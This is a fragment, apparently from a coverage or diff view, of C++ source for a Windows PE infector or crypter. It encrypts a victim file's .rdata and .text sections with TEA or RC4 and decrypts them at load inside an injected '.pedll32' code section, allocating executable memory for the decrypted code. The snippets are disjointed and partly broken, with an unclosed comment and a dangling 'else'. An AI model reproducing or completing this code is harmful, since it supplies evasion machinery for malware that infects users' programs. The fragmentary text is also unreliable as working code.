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Test Coverage
 *    main32.cpp
 *    in main32
         else if (memcmp(pSectionHeader->Name, ".rdata", 6) == 0)
        {    // encrypt rdata section

            if (pInfectMe->IsDLL())
            {    // ignore
++                /*uint32_t *key = (uint32_t *) rc4sbox;
++                LPDWORD encptr = (LPDWORD) pProcessSection->RawData();
++                for(DWORD dwPtr = 0; dwPtr < pProcessSection->SizeOfRawData(); dwPtr += 8, encptr += 2)
++                    tea_encrypt((uint32_t *) encptr, key); // CLOSE COMMENT HERE!


++        //else if (memcmp(pSectionHeader->Name, ".rdata", 6) == 0)
++        //{
++        //    pSectionHeader->Characteristics |= 0x03;
++        //    /*DWORD sizeOfSection = 
++        //        pInfectMeNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress 
++        //            - pProcessSection->VirtualAddress 
++        //            - pInfectMeNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].Size;
++        //                
++        //    LPVOID sectionAddress = rva2addr(pInfectMe, pInfectMeNtHeader, (LPVOID) (pProcessSection->VirtualAddress + pInfectMeNtHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].Size));

++        //    if (pInfectMe->IsDLL())
++        //        cypher_msg(rc4sbox, (PBYTE) sectionAddress, sizeOfSection);
++        //    else
++        //    {
++        //        uint32_t *key = (uint32_t *) rc4sbox;
++        //        LPDWORD encptr = (LPDWORD) sectionAddress;

++        //        for(DWORD dwPtr = 0; dwPtr < sizeOfSection; dwPtr += 8, encptr += 2)
++        //            tea_encrypt((uint32_t *) encptr, key);
++        //    }
++        //}

    //memcpy(pInfectSection->Name, szHermitName, 8);
    //PIMAGE_SECTION_HEADER pInfectSection = IMAGE_FIRST_SECTION(pInfectMeNtHeader);

 *    DllEntryPoint32.cpp
 *    function
 *    #pragma code_seg(".pedll32")
 *    BOOL WINAPI decrypt(struct _vtbl *vtbl, HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
    else if (__memcmp((char *) pSection->Name, szData, 5) == 0)
        cypher_msg(sbox, (PBYTE) lpAddress, pSection->SizeOfRawData);    // decrypt done!
++//        if ((pSection->Characteristics & 0x03) == 3)
++//        {
++//            DWORD sizeOfSection = 
++//                pImageNtHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress 
++//                    - pSection->VirtualAddress 
++//                    - pImageNtHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].Size;
++//            LPVOID lpNewAddress = CALC_OFFSET(LPVOID, lpAddress, pImageNtHeaders32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].Size);
++//            cypher_msg(sbox, (PBYTE) lpNewAddress, sizeOfSection);    // decrypt done!
++//        } 
++//        else if (pSection->Characteristics & 0x02)
++//        {    // packed section!
++//            LPDWORD lpSectionName = (LPDWORD) pSection->Name;
++//            if (*lpSectionName == 0x7865742e)
++//            {    // text section! load from disk!!
++//                char szFileName[MAX_PATH];
++//                DWORD dw = _GetModuleFileNameA(hinstDLL, szFileName, MAX_PATH);
++//                HANDLE h = vtbl->file_open(szFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
++//                g_lpTextBaseAddr = vtbl->mem_alloc(0x0, pSection->Misc.VirtualSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
++//                vtbl->file_seek(h, 0x400, 0, SEEK_SET);            //    << 0x400 - offset on physical disk of first section
++//                _ReadFile(h, g_lpTextBaseAddr, pSection->Misc.VirtualSize, &dw, NULL); //_ReadFile(h, lpAddress, pSection->Misc.VirtualSize, &dw, NULL);
++//                _CloseHandle(h);
++//                cypher_msg(sbox, (PBYTE) g_lpTextBaseAddr, pSection->Misc.VirtualSize); // cypher_msg(sbox, (PBYTE) lpAddress, pSection->Misc.VirtualSize);
++//            }
++//            else
++//        }
    // apply reloc in current section!
    ULONG ptrReloc = CALC_OFFSET(ULONG, pImageDosHeader, (ULONG) lpRelocAddress);

    if (g_decrypted == 0)    // relocation must be done only 1st time!
